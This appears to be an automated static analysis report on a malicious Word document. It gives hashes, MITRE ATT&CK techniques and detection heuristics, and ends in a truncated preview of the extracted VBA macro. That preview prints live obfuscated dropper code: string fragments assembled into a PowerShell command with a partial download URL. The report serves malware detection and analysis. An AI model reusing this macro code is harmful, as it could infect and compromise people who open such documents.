Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c66d88f7e67e066…

MALICIOUS

Office (OLE)

Size: 191.0 KB
Created: 2017-12-11 15:42:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 5ee6c50eab9913448ff471f2d3c41687
SHA-1: de22e9e52ae977140abf9f49cdab7dd2c7250642
SHA-256: 3c66d88f7e67e066b4ee9d961c94a03d80d78360bb0f53150104a7a8c5a08ff4
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within its VBA macros. This, combined with the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic, suggests the macro is designed to execute arbitrary commands. The SE_PASSWORD_ARCHIVE_LURE heuristic and ClamAV detection as 'Img.Dropper.PhishingLure' strongly imply the document is a lure for a password-protected archive, intended to trick the user into opening a malicious payload.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    | Kind      | Source                                                  | Size
macros.bas  | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 74837 bytes
SHA-256 of macros.bas: 41f968f0cc2f47157888a34c034ac9a3b67cadb3e149b0b48cd1817cbfe98ef6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sJSaBGIOoChzj"
Function RESrBjcolH()
XMiGBajZfc = UCase("tKftFzh" + "uUiSLoD" + "GjUcqwN" + "AwFiXVB" + "bGSaJVfLIth") + UCase("wQFZEzqZuYLu" + "bsHrzfZTCrEWdr" + "DITzRfHjtfda" + "ciCuXdicYTJ" + "IPuZADbFF")
zRIisUj = Mid("ZEYEF2c+h2cSh2c+h2cplWRG3izmDU", 6, 16)
uQupMJ = UCase("szwnXns" + "zLmzQDpQh" + "qPaBjIRzcOwinM" + "mhvzhKztFZOV" + "jzdkOwpTcqToV") + UCase("KiURYZNiVuT" + "oqWUcSm" + "QfkOUqWSJrc" + "LkpPlIqw" + "CbjQOIwzIOA")
iMJhrbiF = UCase("lFOdRUIOLV" + "uqUpJzz" + "IfpKjJQM" + "scCUZGww" + "tMNTJInJNYa") + UCase("qEcwzqwufUBH" + "VjTjVkXsdFmwoV" + "XZvsmaBYZYcQ" + "CAYKGVn" + "TZsnCrMwpz")
OXPOjMQ = UCase("nXvMHCtCfDN" + "QNKcmLsFVk" + "JmRSWLZW" + "QwcEfkm" + "GjGBGzwdIqjS") + UCase("TICMlapjX" + "FjNISlGwBZGzm" + "ICmUpNVqDlw" + "ZrtJwCisBVtqd" + "BthtIUVYEjoVu")
idHDpNAVt = Mid("7jcItem(h2c+h2cUeZB+eZBJeZB+eZBhhh2c+h2cuaeZB+eZUmlE9iz9Pbfi", 3, 46)
YJtCPKr = UCase("UOXFYJUY" + "KuLsTXqdjc" + "SiHDADEkipZkY" + "wliuABlzTO" + "NzUfBjSNJp") + UCase("HUFVFjpilKmY" + "lMijbEVOtd" + "DjFhFHWPdKiJ" + "ivBIpcPbaztoA" + "mEUYNrTSViHY")
PWjSAwCjco = UCase("UPcbLcLP" + "scDQucn" + "wrzMcIJd" + "UBmKVbIYXmt" + "iAjlqpRED") + UCase("wRZrizzsGSw" + "IKdrXBvsWptq" + "qQblSsYYs" + "VkdzLbf" + "aUusWIwSQJL")
AGqbkza = UCase("NiThEJOQoc" + "HNQPqCXWa" + "rzXjbVIC" + "zjTipURDtwcV" + "pFciNWvNvmJSVk") + UCase("AdnGOCdiojavYw" + "XzlvISDtIlH" + "DwJMTjWDQK" + "HtMboznbWO" + "OMjaccwjf")
KHCPMritdf = Mid("35RGO7DiGTwZO'+'E)[1,3]+eZBxeZB-JOineZBeZB) ( ('+'(eZB. ( e'+'ZB+eZB([sTR'+'Ing]7c9VErbosEPreFeRE'+'nce)[1,3]+h2cxh2c-joinh2ch2c) ( (h2cUJ'+'hfh2c+h2cransbdhi8wnAifsp", 14, 140)
iIMRVPVWi = UCase("HXjZojV" + "oZZLQGHG" + "DkQqKTWWwuTmA" + "PMnwwBDIiFY" + "AujbQAsZMYvOz") + UCase("NCqmCUo" + "KwdJJFpvFKSTSb" + "WdSuaPqRYzuoB" + "sDECCklwH" + "mjRSkwdmlPTIk")
jiEWkKSEvNj = UCase("HdZhfXGLCv" + "NbdCwrPtU" + "kJmhwftG" + "GjfAAPmtJcjPT" + "DBlCXjlhq") + UCase("LWUnzirN" + "Johhadn" + "zGRotQqj" + "LcWaHZqVpdu" + "takTKKiVUKYjWo")
ErzzkEB = UCase("zEuLuPvGUj" + "hAWGDvjJ" + "zMAObFcLMtBU" + "ZwfJPkfwcisqFX" + "zNmdOZZmDjk") + UCase("nktaiombZbufw" + "kWiHXVizOwH" + "FWzJbcfvrM" + "INCTvDWTGhko" + "IwIOGoV")
OKWhfjC = Mid("fmGDp5ljT0U1td8hG][CHar]39)) eZB)  -cRePLAce  ([char]104+[char]50+[char]99),[char]39 -rEplaCEeZB7c9e'+'Z'+'B,[cha'+'r]36 -rEplaCE eZBxC6eZB,[char]92)) ') -CREPLace ([ChAr]114+[ChArh0ja4wC", 17, 164)
KARsIloBX = UCase("YVSGdETWPqi" + "OrMlAsK" + "fjViGLN" + "ADmETwRz" + "XRuZDVcjHP") + UCase("HZYrLkvsAjz" + "qIWLEZiQZ" + "OdbPibLs" + "wvjEafv" + "jDZwnXzERhJYG")
pPPaUAtVN = UCase("SGiPbQzRABmYnV" + "VBmvsfBrUhzAfT" + "oDrnpHTDU" + "WBFjwPOmCnNUt" + "QRONhdPTwjM") + UCase("hAjmBzRIVdvL" + "SiOdjDUJOX" + "sGVqYDCWTP" + "OGPlPCkHmVDr" + "vBpSjsZTc")
IbVRZZzuDR = UCase("RdlRcRnScujs" + "iDskNOatEtDO" + "JbqpIXlDS" + "bbpuFRFZNsrLO" + "pojkqNki") + UCase("PIMbnmI" + "hPLQIXUV" + "zUpVVzMizUq" + "NFHsYZm" + "qSmFmKwDrhQMP")
cVSRrztE = Mid("abFns4bch2c+h2c ih2eZB+eZBc+heZB+eZB2cnh2c+h2c Uh2c+h2cJhbcd'+')h2c+h2ceZB+eZB{try{eZB+eZBUJhh2c+h2cfh2c+h282Jqm4zQ5PWuYYlvrA", 7, 101)
DzLPhTc = UCase("uvbakSaZ" + "HjTHOunRZHkCp" + "GvWNkqapP" + "zVqobAoLwLjj" + "tbXsbAMrGEj") + UCase("fNEqjRRUhJ" + "EwpYSZFifaUdm" + "zzpDurQJ" + "wnkVNtRLt" + "iTtlctSAaBvK")
KNubqvCc = UCase("NPtitKztn" + "REUKDYkzh" + "lhhjiLBJqSE" + "mzrszpjbtzi" + "ohqlzTwSin") + UCase("jiJzhJqCUNn" + "WTLYvRFin" + "MvBVPJX" + "lzzTKJppwS" + "vKHAPTS")
JEsWq = UCase("nZBtiuz" + "FkwLzkkRqHOO" + "BRFJobZKAWmhb" + "ZWzzbGA" + "mTKFJAEjzLUPmI") + UCase("juTYXEOJdYjKur" + "nHpFilwi" + "YFQXbNLOQ" + "QDHicrYKhhZ" + "JspXMajiKlLAz")
VTbZA = Mid("zRpG1V/,hth2c+h2ctp:'+'/h2c+h2c/karh2ciw5amEUnMioNPP4hqw7K5YNJo4Jiqs7", 5, 34)
lznDziWf = UCase("uBAYEqiWNwMtj" + "wboSCICjFSn" + "ssEvmBzWdUk" + "udjmcrmZWQL" + "MwRJlLwilZz") + UCase("RSLKvKAiqOXY" 
... (truncated)